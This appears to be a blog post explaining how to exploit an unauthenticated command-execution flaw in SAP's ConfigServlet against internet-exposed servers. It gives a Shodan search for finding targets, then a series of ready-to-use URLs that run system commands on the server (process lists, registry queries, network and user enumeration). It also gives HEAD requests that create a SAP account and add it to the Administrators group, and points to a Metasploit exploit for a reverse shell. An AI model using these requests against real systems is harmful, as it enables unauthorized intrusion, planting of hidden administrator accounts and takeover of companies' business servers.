SAP is the most popular business application. More than 180000 customers worldwide have it.
Companies like Nike, Coca-Cola, Sony working... with SAP systems
In this post, we are going to talk about how we can exploit this weaknesses.
First of all, we need to locate possibles SAP vulnerables servers. As usual, we are going to use Shodan.
http://www.shodanhq.com/search?q=%2Firj%2Fportal+50000
Then, we are going to execute commands on the SAP server through our web browser using the nexts URL queries without authentication.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tasklist
We can see the running processes on the server
We can see/edit the Windows Server Registry.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=reg query hkcu\console\
We can see the network interfaces.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig /all
We can malke a traceroute in order to discover the network where SAP server is hosted.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tracert www.google.com
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=net user
We can show his arp table.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=arp%20-a
We actually do a ping against servers in the same network.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ping%2010.100.8.221
Another great discovery is to create an administrator SAP user across HEAD posts...
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla HEAD /ctc/ConfigServlet?para=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=blabla,GROUPNAME=Administrators
In 2013-04-25 Andras Kabai published an exploit. You can run this exploit with Metasploit, upload a payload, get a reverse shell and take the control over the SAP server.
You can download the exploit called "SAP ConfigServlet Remote Unauthenticated Payload Execution" here: http://www.exploit-db.com/exploits/24996/
Finally you can see the original document here.
0 comments:
Post a Comment